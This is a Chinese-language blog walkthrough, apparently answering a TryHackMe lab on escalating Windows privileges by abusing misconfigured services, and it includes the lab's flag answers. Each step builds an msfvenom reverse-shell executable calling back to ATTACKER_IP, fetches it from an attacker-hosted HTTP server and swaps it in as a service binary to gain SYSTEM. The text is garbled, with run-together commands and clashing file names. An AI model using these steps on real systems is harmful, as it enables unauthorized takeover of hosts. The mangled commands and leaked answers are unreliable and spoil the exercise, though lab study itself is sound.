【THM- 题目答案】:Privilege Escalation-Windows Privilege Escalation:Abusing Service Misconfigurations

张

张建站

2026/4/21 17:13:20

10分钟阅读

【THM- 题目答案】:Privilege Escalation-Windows Privilege Escalation:Abusing Service Misconfigurations

1. Get the flag on svcusr1s desktop. -在svcusr1的桌面上获取该标志。THM{AT_YOUR_SERVICE}【思路】这一课题目相对比较简单因为直接按照课程内容就可以获取最终结果。1 首先在攻击机上生成反弹shell二进制文件ATTACKER_IP为THM AttackBox虚拟机的IP地址msfvenom -p windows/x64/shell_reverse_tcp LHOSTATTACKER_IPLPORT4445-f exe-service -o rev-svc.exe2其次在攻击机上启动一个监听进程端口为上一步命令中的4445.nc -lvp 44453在攻击机上启动一个http.server默认服务端口为8000python3 -m http.server4在靶机上powershell下载攻击机上生成的反弹shell可执行文件wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe5授予Everyone执行有效负载的权限move WService.exe WService.exe.bkpmove C:\Users\thm-unpriv\rev-svc.exe WService.exeicacls WService.exe /grant Everyone:F6重新启动服务sc stop windowsschedulersc start windowsscheduler7攻击机上查看已获取权限直接在用户svcusr1的Desktop中type flag.txt即可。2. Get the flag on svcusr2s desktop. -在svcusr2的桌面上获取该标志。THM{QUOTES_EVERYWHERE}【思路】这一课题目相对比较简单因为直接按照课程内容就可以获取最终结果。1 首先在攻击机上生成反弹shell二进制文件ATTACKER_IP为THM AttackBox虚拟机的IP地址msfvenom -p windows/x64/shell_reverse_tcp LHOSTATTACKER_IP LPORT4446 -f exe-service -o rev-svc2.exe2其次在攻击机上启动一个监听进程端口为上一步命令中的4446.nc -lvp 44463在攻击机上启动一个http.server默认服务端口为8000python3 -m http.server4在靶机上powershell下载攻击机上生成的反弹shell可执行文件wget http://ATTACKER_IP:8000/rev-svc6.exe -O rev-svc6.exe5将其存储在C:\Users\thm unpiv\rev-svc3.exe路径中授予Everyone执行有效负载的权限move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exeicacls C:\MyPrograms\Disk.exe /grant Everyone:F6重新启动服务sc stop disk sorter enterprisesc start disk sorter enterprise8攻击机上查看已获取权限直接在用户的Desktop中type flag.txt即可。3. Get the flag on the Administrators desktop. -在管理员桌面上获取标记。THM{INSECURE_SVC_CONFIG}【思路】这一课题目相对比较简单因为直接按照课程内容就可以获取最终结果。1 首先在攻击机上生成反弹shell二进制文件ATTACKER_IP为THM AttackBox虚拟机的IP地址msfvenom -p windows/x64/shell_reverse_tcp LHOSTATTACKER_IPLPORT4447 -f exe-service -o rev-svc3.exe2其次在攻击机上启动一个监听进程端口为上一步命令中的4447.nc -lvp 44473在攻击机上启动一个http.server默认服务端口为8000python3 -m http.server4在靶机上powershell下载攻击机上生成的反弹shell可执行文件wget http://ATTACKER_IP:8000/rev-svc3.exe -O rev-svc3.exe5将其存储在C:\Users\thm unpiv\rev-svc3.exe路径中授予Everyone执行有效负载的权限icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F6更改服务的关联可执行文件和帐户sc config THMService binPath C:\Users\thm-unpriv\rev-svc3.exe obj LocalSystem7重新启动服务sc stop THMServicesc start THMService8攻击机上查看已获取权限直接在用户的Desktop中type flag.txt即可。